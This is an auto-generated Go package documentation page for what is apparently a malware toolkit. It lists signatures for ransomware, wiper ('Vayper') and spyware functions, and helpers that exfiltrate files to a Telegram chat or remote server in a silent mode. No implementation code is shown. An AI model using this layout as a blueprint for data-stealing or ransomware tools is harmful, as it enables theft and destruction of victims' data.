Documentation
¶
Index ¶
- Constants
- func Ransom() error
- func SendFilesConcurrently(token, chatID string, filePaths []string, silent bool) []error
- func SendToServer(server, port, encryption, filePath string, silent bool) error
- func SendToTelegram(token, chatID, filePath string, silent bool) error
- func Spyware(dumpType, token, chatID string, silent bool) error
- func SpywareServer(dumpType, server, port, encryption string, silent bool) error
- func Vayper() error
Constants ¶
View Source
const ( ColorReset = "\033[0m" ColorRed = "\033[31m" ColorGreen = "\033[32m" ColorYellow = "\033[33m" ColorWhite = "\033[37;1m" )
ANSI color codes
Variables ¶
This section is empty.
Functions ¶
func SendFilesConcurrently ¶
SendFilesConcurrently sends multiple files to Telegram concurrently
func SendToServer ¶
SendToServer sends a file to the specified server
func SendToTelegram ¶
SendToTelegram sends a file to the specified Telegram chat using multipart/form-data
func SpywareServer ¶
SpywareServer handles data extraction and sends to server
Types ¶
This section is empty.
Click to show internal directories.
Click to hide internal directories.